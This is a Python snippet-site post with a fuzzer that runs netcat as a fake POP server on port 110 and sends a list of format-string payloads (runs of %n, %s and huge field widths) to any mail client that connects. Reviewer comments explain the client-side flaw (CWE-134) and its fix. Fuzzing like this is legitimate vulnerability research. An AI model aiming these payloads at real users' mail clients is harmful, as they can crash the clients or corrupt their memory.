snippets / Fuzzer client pop

Language: Python - First posted by nicoj on 2007-10-4 10:29 (1 year, 1 month)
Link to the snippet: http://www.friendsnippets.org/snippet/54/

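Fuzzer for POP clients such as Thunderbird, Outlook, ... The fuzzer needs nc (netcat) to work: it runs nc as a listener on port 110 and sends format-string test lines to whichever mail client connects.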

  1 #!/usr/bin/python
2 #
3 # 17/04/2007
4 # Created by : pilihat
5 # example:
6 # ./FuzzerPopClient.py
7 #
8 #
9
10 import os
11 import time
12 import fcntl
13
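class doCmd:
    """Run an external command and exchange text lines with it over pipes.

    The fuzzer in this file uses it to drive an ``nc`` listener: lines written
    here reach the connected client, and lines the client sends are read back.

    Methods report failure with string codes rather than exceptions, because
    callers in this file compare against them:
    ``"-1"`` launch failed, ``"-2"`` write failed, ``"-3"`` read failed.
    """

    def __init__(self, cmd, timeout=1, args=None):
        """Remember the command; nothing is started until do_command()."""
        self.cmd = cmd
        self.fread = None        # child's stdout, set by do_command()
        self.fwrite = None       # child's stdin, set by do_command()
        self.timeout = timeout   # seconds slept by timeout_command()
        self.args = args
        self.current_cmd = ""    # last line handed to write_to_command()
        self.response = ""       # last line returned by read_from_command()
        self.write_error = 0     # number of failed writes so far

    def __call__(self):
        """Start the command and return this object, so it can be chained."""
        self.do_command()
        self.no_wait_command()
        return self

    def do_command(self):
        """Launch the command and keep its stdin/stdout pipes.

        Returns "-1" if the launch raised, otherwise None.
        """
        # args defaults to None; concatenating it unconditionally raised
        # TypeError before the try block was even entered.
        if self.args is None:
            command_line = self.cmd
        else:
            command_line = self.cmd + " " + self.args
        print(command_line)
        try:
            # NOTE(review): os.popen2 hands the string to a shell, so cmd and
            # args must stay trusted constants. It is deprecated since
            # Python 2.6 and removed in Python 3; subprocess.Popen with an
            # argument list is the replacement.
            self.fwrite, self.fread = os.popen2(command_line)
        except Exception:
            # Exception, not a bare except, so Ctrl-C still stops the fuzzer.
            print("Failed to exec comand")
            return "-1"

    def no_wait_command(self):
        """Placeholder kept for the call sites; always returns 0.

        The original switched both pipes to O_NONBLOCK through fcntl, but that
        code was commented out, so reads presumably block until the peer sends
        a full line or closes the connection.
        """
        return 0

    def write_to_command(self, toWrite):
        """Send one line to the command.

        Returns "-2" and increments write_error if the write raised, otherwise
        None. Callers in this file treat "-2" as the cue to restart the
        listener.
        """
        try:
            self.current_cmd = toWrite
            print("> Send " + toWrite)
            self.fwrite.write(toWrite + "\n")
            self.fwrite.flush()
        except Exception:
            self.write_error = self.write_error + 1
            print('Command failed: ' + toWrite)
            return "-2"

    def read_from_command(self):
        """Read one line from the command.

        Returns the line (empty string when nothing was read), or "-3" if the
        read raised, which includes the case where the command was never
        started.
        """
        self.response = ""
        try:
            self.fread.flush()
            self.response = self.fread.readline()
            if self.response != "":
                print("< Read " + self.response)
            return self.response
        except Exception:
            return "-3"

    def close_command(self):
        """Close both pipes and return 0.

        Safe to call when the command was never started. The write pipe is
        closed even if closing the read pipe raises.
        """
        try:
            if self.fread is not None:
                self.fread.close()
        finally:
            if self.fwrite is not None:
                self.fwrite.close()
        return 0

    def timeout_command(self):
        """Sleep for the configured timeout, in seconds."""
        time.sleep(self.timeout)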
78
79
# Format-string test cases, taken from taof - http://sourceforge.net/projects/taof
#
# Each entry is sent to the connected mail client as one server line. They
# probe for a client that passes server-supplied text to a printf-style
# function as the format argument (CWE-134). The fix on the client side is a
# constant format string with the server text passed as data.
formatstrings = [
    # Empty lines.
    "",
    "",
    "",
    # Repeated conversions of growing length.
    "%s" * 4,
    "%s" * 8,
    "%s" * 15,
    "%s" * 30,
    "%x" * 1024,
    "%n" * 1025,
    "%s" * 2048,
    "%s%n%x%d" * 5000,
    "%s" * 30000,
    "%s" * 40000,
    # Large precision values.
    "%.1024d",
    "%.2048d",
    "%.4096d",
    "%.8200d",
    # Very large field widths, once and repeated.
    "%99999999999s",
    "%99999999999d",
    "%99999999999x",
    "%99999999999n",
    "%99999999999s" * 1000,
    "%99999999999d" * 1000,
    "%99999999999x" * 1000,
    "%99999999999n" * 1000,
    "%08x" * 100,
    # Escaped percent signs followed by a width and a conversion letter.
    "%%20s" * 1000,
    "%%20x" * 1000,
    "%%20n" * 1000,
    "%%20d" * 1000,
    # One line mixing many conversion letters, plain and with a doubled percent.
    "%#0123456x%08x%x%s%p%n%d%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%#0123456x%%x%%s%%p%%n%%d%%o%%u%%c%%h%%l%%q%%j%%z%%Z%%t%%i%%e%%g%%f%%a%%C%%S%%08x",
]
82
83 #formatstrings = ["%99999999999n","%99999999999s" * 1000, "%99999999999d" * 1000, "%99999999999x" * 1000, "%99999999999n" * 1000, "%08x" * 100, "%%20s" * 1000,"%%20x" * 1000,"%%20n" * 1000,"%%20d" * 1000, "%#0123456x%08x%x%s%p%n%d%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%#0123456x%%x%%s%%p%%n%%d%%o%%u%%c%%h%%l%%q%%j%%z%%Z%%t%%i%%e%%g%%f%%a%%C%%S%%08x"]
84
85 #formatstrings=["%%20d" * 1000,"%%20d" * 1000,"%%20d" * 1000]
86 #formatstrings=["1","2","3","4","5"]
87
def do_server_pop():
    """Start an nc listener on port 110 and send the "+OK" greeting line.

    Returns the doCmd object wrapping the listener so the caller can keep
    writing to and reading from the connected client.
    """
    # NOTE(review): port 110 is below 1024, so nc normally needs elevated
    # privileges to bind it. No bind address is given, so the listener
    # presumably accepts connections on every interface - confirm for the nc
    # variant in use and keep the harness on an isolated test network.
    listener = doCmd("nc", 2, "-l -p110 -v")
    # Calling the object runs do_command() and then no_wait_command().
    pop_server = listener()
    pop_server.write_to_command("+OK")
    return pop_server
94
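def wait_client_response(pop_server, wait=2):
    """Read one line from the client, retrying while nothing arrives.

    pop_server must offer read_from_command() and timeout_command(). An empty
    string or "-3" from read_from_command() counts as "nothing yet". After
    each miss the function sleeps through timeout_command() and reads again,
    for at most `wait` retries.

    Returns the line that was read, or "-1" once the retries are used up.
    """
    response = pop_server.read_from_command()
    retries = 0
    while response in ("", "-3"):
        # Give up only while the latest read is still empty. The original
        # returned "-1" straight after the last retry without looking at it,
        # so a line that arrived on that retry was thrown away.
        if retries >= wait:
            return "-1"
        pop_server.timeout_command()
        response = pop_server.read_from_command()
        retries += 1
    return response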
107
def fuzz_pop_client():
    """Serve every entry of formatstrings to connecting POP clients, forever.

    Each round starts a listener, reads the client's first line, then sends
    the test cases one by one and prints what comes back. A failed write
    restarts the listener and the round moves on to the next test case. The
    round ends with QUIT, and the outer loop never exits on its own.
    """
    print("Connection")

    while True:
        pop_server = do_server_pop()
        response = pop_server.read_from_command()
        print("RESPONSE ---- : " + response)

        for payload in formatstrings:
            print("-------------- FUZZ -------------")
            if pop_server.write_to_command(payload) == "-2":
                # NOTE(review): a write presumably fails only once the client
                # is already gone, so the test case that ended the session may
                # be an earlier one than the payload reported here. Replay the
                # preceding cases to confirm.
                pop_server.close_command()
                time.sleep(1)
                pop_server = do_server_pop()
                continue
            response = pop_server.read_from_command()
            print("RESPONSE ---- : " + response)

        pop_server.write_to_command("QUIT")
        pop_server.close_command()
129
# Script entry point: run the endless fuzzing loop when executed directly.
if __name__ == "__main__":
    fuzz_pop_client()